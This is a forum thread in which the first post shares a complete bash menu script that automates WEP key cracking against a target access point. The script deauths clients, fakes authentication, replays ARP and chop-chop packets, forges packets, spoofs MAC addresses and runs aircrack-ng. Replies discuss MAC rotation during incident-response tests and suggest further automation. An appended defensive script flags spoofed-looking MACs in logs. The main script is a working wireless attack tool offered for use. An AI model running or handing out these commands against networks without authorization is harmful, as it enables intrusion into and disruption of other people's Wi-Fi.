Thread: Community wep script

  1. #1
    Member imported_vvpalin
    Join Date
    Apr 2009
    Posts
    442

    Default Community wep script

    Let me start by saying this is not made for people that don't already know the commands. If you haven't done it all on your own already, look some other place for help.

    I wrote this because I got sick of typing everything in over and over again. While it doesn't support everything, it does enough. It's still always best to do the more advanced attacks on your own as it's hard to script them. I have tried most every script out there including the spoonwep; each falls short of what I wanted in their own special way.

    Anyways, as the title says, this is community .. meaning any idea you have "if it's decent" will be implemented, and I'll see what I can do about getting it included in the final once it's polished off. Big thanks to everyone on IRC who puts up with me .. cheers =]

    #!/bin/bash
    # vvpalins community wepscript
    # wepscript.sh

    echo "######################################"
    echo "##### PLEASE ENTER THE INTERFACE #####"
    echo "######################################"
    read ADAPTER

    function apname {
    echo "######################################"
    echo "##### TYPE THE BSSID OF THE AP #######"
    echo "######################################"
    read AP
    }

    function clientname {
    echo "######################################"
    echo "####### TYPE THE CLIENTS MAC #########"
    echo "######################################"
    read CLIENT
    }

    function repeat {

    clear
    echo "######################################"
    echo "#### TYPE *up* TO BRING UP ADAPTER ###"
    echo "######################################"
    echo "#### TYPE /\finish him/\ TO CRACK ####"
    echo "######################################"
    echo "0. Airodump-ng"
    echo "1. Test Injection"
    echo "2. Deauth all from AP"
    echo "3. Deauth client from AP"
    echo "4. Fake auth to AP"
    echo "5. Arpreplay"
    echo "6. Arpreplay with packet size"
    echo "7. p0841"
    echo "8. Chop Chop Attack"
    echo "9. Forge and inject packet"
    echo "10. Change your MAC"

    read OPTION


    if [ "$OPTION" = "up" ]
    then
    killall dhclient
    killall NetworkManager
    killall wpa_supplicant
    ifconfig $ADAPTER down
    airmon-ng check kill
    airmon-ng stop $ADAPTER
    airmon-ng stop mon0
    airmon-ng stop mon1
    macchanger --mac 00:11:22:33:44:55 $ADAPTER
    airmon-ng start $ADAPTER
    terminator -e "airodump-ng --berlin 10 $ADAPTER; bash" &
    clear
    fi


    if [ "$OPTION" = "0" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    echo "type the channel number"
    read CHAN
    terminator -e "airodump-ng -c $CHAN -w new --bssid $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "1" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    terminator -e "aireplay-ng -9 -a $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "2" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi
    terminator -e "aireplay-ng -0 0 -a $AP $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "3" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -0 0 -a $AP -c $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "4" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -1 2000 -a $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "5" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -3 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "6" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -3 -x 1000 -n 100000 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "7" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "8" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    terminator -e "aireplay-ng -4 -b $AP -h $CLIENT $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "9" ]
    then
    if [ "$AP" = "" ]
    then
    apname
    fi

    if [ "$CLIENT" = "" ]
    then
    clientname
    fi
    XOR=$(ls | grep "replay.*\.xor" | cut -d " " -f 5)
    # -k and -l are the destination and source IP of the forged ARP request (four octets each)
    packetforge-ng -0 -a $AP -h $CLIENT -k 255.255.255.255 -l 255.255.255.255 -y $XOR -w arp-request
    terminator -e "aireplay-ng -2 -r arp-request $ADAPTER; bash" &
    fi


    if [ "$OPTION" = "10" ]
    then
    echo "What mac do you want to change to?"
    echo "If you want a random mac type random"
    read MAC
    if [ "$MAC" = "random" ]
    then
    clear
    macchanger -r $ADAPTER
    sleep 4
    else
    clear
    macchanger -m $MAC $ADAPTER
    sleep 4
    fi
    fi


    if [ "$OPTION" = "finish him" ]
    then
    terminator -e "aircrack-ng -a wep *.cap; bash" &
    fi


    }


    for (( ; ; ))
    do
    repeat
    done

    Remember this is only going to be as good as you guys make it so please post suggestions.

    pastebin - collaborative debugging tool
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  2. #2
    Member
    Join Date
    May 2009
    Posts
    102

    Default finish him!

    Nice "finish him" instruction. =) I wonder what's the need of changing MAC address other than when dealing with MAC filtered APs...

  3. #3
    Very good friend of the forum Gitsnik
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Quote Originally Posted by wif1bust3r
    Nice "finish him" instruction. =) I wonder what's the need of changing MAC address other than when dealing with MAC filtered APs...

    Sometimes when we're testing incident response teams we change our MACs quite regularly (mostly into what dirty words we can) to confuse them as we hit each AP and/or Switch in turn (802.11 or 802.3). There are valid uses for it.

    Am I the only person who still uses airoscript-ng?

    But, suggestions, perhaps an automatic attack section for clientless and cliented. I have two scripts for such a purpose on my BT laptop (far easier to type cless.sh apinfo.txt!) which read BSSID, ESSID, CHANNEL and maybe CLIENT from a txt file. It sort of removes the need to be fiddling around for a while with each command manually - you can just hit Enter as it goes.

    Might be a good suggestion, might be a bad one.

    Maybe swap terminator for xterm or something a little more common. That could be preference though, if I'm not in xterm it's Eterm or Konsole.

    My $0.02
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
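
A defender-side counterpart to the MAC changing discussed in this thread (the script's `up` option sets 00:11:22:33:44:55, and post #3 describes rotating MACs while testing incident response teams): an added example, not code from any poster, that classifies station MACs pulled from association logs. The log format, sample lines and the function names `classify_mac` and `flag_stations` are assumptions made for illustration.

```bash
#!/bin/sh
# Added example: classify station MACs taken from association logs.

classify_mac() (
    mac=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    if ! printf '%s\n' "$mac" | grep -Eq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'; then
        echo invalid
        exit 0          # leaves only this function's subshell
    fi
    IFS=:; set -- $mac; unset IFS      # split into six octets
    first=$((0x$1))

    # A constant step between octets (00:11:22:33:44:55, 0a:0b:0c:0d:0e:0f)
    # looks hand-typed rather than vendor-assigned.
    step=$(( (0x$2 - 0x$1 + 256) % 256 ))
    patterned=1; prev=$1; shift
    for o in "$@"; do
        [ $(( (0x$o - 0x$prev + 256) % 256 )) -eq "$step" ] || patterned=0
        prev=$o
    done

    if [ "$patterned" -eq 1 ]; then
        echo placeholder-pattern
    elif [ $((first & 1)) -ne 0 ]; then
        echo multicast-source        # group bit is never valid in a source MAC
    elif [ $((first & 2)) -ne 0 ]; then
        echo locally-administered    # locally assigned, not a vendor OUI
    else
        echo ok
    fi
)

# Constructed sample lines; the "<time> assoc ap=<bssid> sta=<mac>" format is assumed.
SAMPLE_LOG='10:01:02 assoc ap=00:1a:2b:3c:4d:5e sta=00:11:22:33:44:55
10:01:09 assoc ap=00:1a:2b:3c:4d:5e sta=3c:5a:b4:10:9f:21
10:02:30 assoc ap=00:1a:2b:3c:4d:5e sta=DE:AD:BE:EF:00:01
10:03:11 assoc ap=00:1a:2b:3c:4d:5e sta=01:00:5e:00:00:fb'

# Print "<verdict> <mac>" for every station that is not "ok".
flag_stations() {
    while read -r _time _event _ap sta; do
        case $sta in sta=*) ;; *) continue ;; esac
        verdict=$(classify_mac "${sta#sta=}")
        [ "$verdict" = ok ] || echo "$verdict ${sta#sta=}"
    done
}

printf '%s\n' "$SAMPLE_LOG" | flag_stations
```

A locally administered address on its own is common on modern clients that randomize their MAC, so that verdict is a triage hint to correlate with other signals rather than an alert by itself.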
